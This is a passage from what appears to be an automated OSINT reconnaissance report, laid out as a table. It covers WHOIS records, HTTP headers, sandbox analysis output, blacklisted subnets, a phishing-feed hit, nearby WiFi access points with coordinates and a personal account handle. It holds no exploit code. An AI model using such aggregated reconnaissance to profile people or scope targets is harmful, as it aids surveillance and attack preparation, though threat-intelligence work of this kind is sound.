*/*\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: maxcdn.bootstrapcdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /bootstrap/3.3.6/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: maxcdn.bootstrapcdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /bootstrap/3.3.6/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: maxcdn.bootstrapcdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /releases/v5.0.9/js/all.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: use.fontawesome.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /releases/v5.0.9/js/all.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: use.fontawesome.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /assets/css/style.css?ver=4.5.3 HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: docs.verapdf.org" (Indicator: "mozilla/5.0 (")\n "GET /assets/css/style.css?ver=4.5.3 HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: docs.verapdf.org" (Indicator: "user-agent: ")\n "GET /ajax/libs/jquery/1.11.3/jquery.min.js?ver=1.11.3 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: ajax.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /ajax/libs/jquery/1.11.3/jquery.min.js?ver=1.11.3 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: ajax.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'ide | 185.199.111.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-proxy-cache: MISS | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:06:25:BA:AB:53) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.181): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx Guest (Net ID: 00:01:21:26:34:40) | 41.8781, -87.6298 |
| 2023-05-12 02:44:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | githubusercontent.com | githubusercontent.com |
| 2023-05-12 03:00:53 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.82): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:41 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.109.133:443 | 185.199.109.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | beeline1 (Net ID: 00:01:38:A8:7B:F3) | 34.0544, -118.244 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Allstate 2.4G (Net ID: 00:02:6F:F8:0A:40) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0031.github.io]
https://www.openphish.com/feed.txt | 0031.github.io |
| 2023-05-12 03:17:33 | Similar Domain - Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: AIHU.XYZ
Registry Domain ID: D351663834-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: https://idwebhost.com
Updated Date: 2023-03-07T15:29:15.0Z
Creation Date: 2023-03-02T11:39:51.0Z
Registry Expiry Date: 2024-03-02T23:59:59.0Z
Registrar: CV Jogjacamp
Registrar IANA ID: 1478
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: FENG SHENG FEI XING
Registrant State/Province: Jiangsu
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.DAN.COM
Name Server: NS2.DAN.COM
Name Server: VERIFICATION-EE5FF475.NS3.DAN.HOSTING
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:32.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: AIHU.XYZ
Registry Domain ID: D351663834-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: http://resellercamp.com/
Updated Date: 2023-03-02T11:40:08Z
Creation Date: 2023-03-02T11:39:51Z
Registrar Registration Expiration Date: 2024-03-02T23:59:59Z
Registrar: CV. Jogjacamp
Registrar IANA ID: 1478
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
Domain Status: clientTransferProhibited (http://icann.org/epp#clientTransferProhibited)
Registrant Organization: FENG SHENG FEI XING
Registrant State/Province: Jiangsu
Registrant Country: CN
Name Server: ns1.dan.com
Name Server: ns2.dan.com
Name Server: verification-ee5ff475.ns3.dan.hosting
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:02:33Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
Registration Service Provided By: PREMIUMDOMAINSELLER
The data in this whois database is provided to you for information purposes
only, that is, to assist you in obtaining information about or related to a
domain name registration record. We make this information available "as is",
and do not guarantee its accuracy. By submitting a whois query, you agree
that you will use this data only for lawful purposes and that, under no
circumstances will you use this data to:
(1) enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or
(2) allow, enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic mail, or
by telephone.
The compilation, repackaging, dissemination or other use of this data is
expressly prohibited without prior written consent from us. The Registrar of
record is CV. Jogjacamp.
We reserve the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
| aihu.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-ray: 7c5f6036af1541db-EWR | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:13 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-19c8\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:13 GMT", "cf-ray": "7c5f6036af1541db-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 02:46:49 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | 104.196.30.220:443 | 104.196.30.220 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | prr (Net ID: 00:0C:41:CA:76:65) | 39.0469, -77.4903 |
| 2023-05-12 02:59:44 | Co-Hosted Site - Domain Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: GITHUB.COM
Registry Domain ID: 1264983250_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-09-07T09:10:44Z
Creation Date: 2007-10-09T18:20:50Z
Registry Expiry Date: 2024-10-09T18:20:50Z
Registrar: MarkMonitor Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: DNS1.P08.NSONE.NET
Name Server: DNS2.P08.NSONE.NET
Name Server: DNS3.P08.NSONE.NET
Name Server: DNS4.P08.NSONE.NET
Name Server: NS-1283.AWSDNS-32.ORG
Name Server: NS-1707.AWSDNS-21.CO.UK
Name Server: NS-421.AWSDNS-52.COM
Name Server: NS-520.AWSDNS-01.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
| github.com |
| 2023-05-12 02:49:59 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://www.bloknmesh.com/de-de/categories/temporary-fencing', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"109.237.26.201:443"\n "142.250.189.170:443"\n "185.199.110.153:443"\n "142.251.46.232:443"\n "142.250.191.78:443"\n "142.251.2.157:443"\n "142.251.46.226:443"\n "142.251.32.46:443"\n "142.251.46.227:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "gb_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Tar3638.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3599.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"flagicons.lipis.dev"\n "www.bloknmesh.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3440"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d70_IE_EarlyTabStart_0xd40_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d70_ConnHashTable<3440>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d70_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d70_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d70_IESQMMUTEX_0_331"\n "IsoScope_d70_IE_EarlyTabStart_0xd40_Mutex"\n "IsoScope_d70_ConnHashTable<3440>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab3637.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab3598.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab383E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"hire-green_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "search-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "rapid-green_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "arrow-down-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "search_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "search-toggle-close_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "angle-right-small-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "angle-left-small-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "be_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "at_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "linkedin_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "twitter_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "facebook_2_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "footer-logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "installation-green_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "logo-mobile_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "youtube_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "country-select-arrow_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.bloknmesh.com/de-de/categories/temporary-fencing"\n Pattern match: "https://www.bloknmesh.com"\n Pattern match: "www.bloknmesh.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"www.bloknmesh.com" seems to be random'}], u'threat_level': 0, u'size': None, u'job_id': u'63eb580b7d33587f2f443f35', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'109.237.26.201', u'142.250.189.170', u'185.199.110.153', u'142.251.46.232', u'142.250.191.78', u'142.251.2.157', u'142.251.46.226', u'142.251.32.46', u'142.251.46.227'], u'sha256': u'98228ff90c9f8d437b7717a175c4c0a4634b8aa926c865d3f9a93f694d5fffb2', u'sha512': u'42484cfd73b15b501e843f45713f7d5f1f010ae634f38fdafc0dca634b6821dd06299ad0a07a0e443ec47ef23bf4d39bfc93311d395add81ff8abda276828da7', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://www.bloknmesh.com/de-de/categories/temporary-fencing', u'submission_id': u'63eb580b7d33587f2f443f36', u'created_at': u'2023-02-14T09:44:43+00:00', u'filename': None}], u'analysis_start_time': u'2023-02-14T09:44:43+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 9, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'63008ab1a3067ef2a0dcdbf2ec36585f', u'network_mode': u'default', u'processes': [], u'sha1': u'2c9b2fd9468f38f8c453657c6a2c2e71f321798e', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'flagicons.lipis.dev', u'www.bloknmesh.com'], u'extracted_files': [], u'type_short': []}] | 185.199.110.153 |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | Trello (Category: social)
https://trello.com/baptistevauthey | baptistevauthey |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Power IT (Net ID: 00:00:00:05:55:55) | 41.8781, -87.6298 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.221): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:A1:D8:0C) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | DR.KASIM (Net ID: 00:12:CF:44:EA:8F) | 40.2024, 29.0398 |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | San Francisco, California, 94107, United States, North America |
| 2023-05-12 02:56:50 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:57:f8:5f:6c:a4:d7:b1:d8:61:78:13:80:db:41:a4:54:3d
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:23:04 2022 GMT
Not After : Feb 15 13:23:03 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d4:b5:dd:1d:03:00:c2:48:cc:5b:27:58:5a:1a:
ae:80:1c:0d:53:93:fb:69:7f:93:43:76:4d:e8:73:
1c:07:a2:3d:20:72:26:de:8b:cf:5e:08:ec:68:b1:
f5:77:47:34:1f:fc:12:0e:2f:4f:a4:d2:06:11:00:
78:b4:0d:40:fa:ba:21:05:d4:2d:c5:6d:14:14:39:
10:9a:e0:36:33:c9:8c:bb:e8:d5:33:a2:fb:d9:f7:
b5:1a:30:55:aa:67:e3:41:20:33:a1:e6:ed:c9:c3:
5b:50:61:0a:65:ba:c7:cc:f0:84:a3:6e:26:65:39:
57:a4:99:3b:03:5d:af:09:43:83:69:7f:84:65:08:
2e:12:10:15:1c:ad:1f:68:90:6a:0e:97:7d:ef:7a:
22:74:df:40:68:54:b2:c7:43:c9:cb:1c:9c:53:1d:
c4:68:a0:95:76:a1:bf:c8:18:fb:9d:30:f5:ff:26:
f8:35:1d:65:e6:a1:bc:6a:7f:70:ab:aa:3e:d6:87:
e6:17:39:3e:1e:ae:62:43:5c:02:c9:ab:c6:49:9a:
2c:43:3e:b0:0a:bb:6b:20:c9:45:43:a6:79:f2:70:
bf:69:eb:cb:fb:70:35:1a:f8:04:00:26:77:08:9e:
32:00:34:fd:0a:63:db:bc:61:0a:d9:52:e5:61:03:
a2:9b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:5A:2D:BE:67:DF:4E:45:A4:AD:A5:64:7A:31:7E:B3:39:8F:63:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
36:be:9b:e9:c6:04:01:1c:2c:7e:ac:66:f1:b1:7c:f0:ee:5e:
a7:7a:d6:c8:9e:79:b8:66:86:a3:c0:1f:2e:30:41:c8:ab:65:
cc:a9:76:5f:0c:9a:14:80:51:ed:a7:e9:7f:f2:bd:57:5c:9b:
04:31:55:52:cc:d9:5d:ee:2c:9b:e4:bf:d8:d9:92:19:14:10:
dd:51:d3:7f:4d:75:15:b6:a8:e3:fc:04:59:c4:b7:64:9f:51:
37:3d:db:dc:3f:62:ca:61:18:50:70:5c:05:5f:99:79:0d:a0:
0e:c8:35:8d:bb:f1:5e:79:d7:db:26:ea:af:a1:41:c0:38:87:
5a:1f:f0:8e:e8:e0:82:24:9f:5a:90:83:7a:4a:a7:ba:46:58:
13:f1:c7:56:f8:28:af:a1:60:8b:a6:cd:3c:87:94:ac:c7:fc:
20:7c:c8:b3:c3:76:a4:35:2d:72:c3:ee:ac:78:b8:e1:34:03:
38:a2:6a:44:20:aa:90:30:a3:3e:ab:ba:d0:59:e6:ec:06:0e:
8d:eb:87:b7:3c:38:30:f7:f2:e8:b8:2e:15:05:ad:78:2f:e8:
3c:50:44:89:a3:d8:8d:08:05:5d:7a:05:56:82:9c:5e:c3:16:
2a:39:5a:33:90:bb:6e:e6:f1:42:6a:27:46:25:76:11:a4:8f:
4f:1d:29:59
|
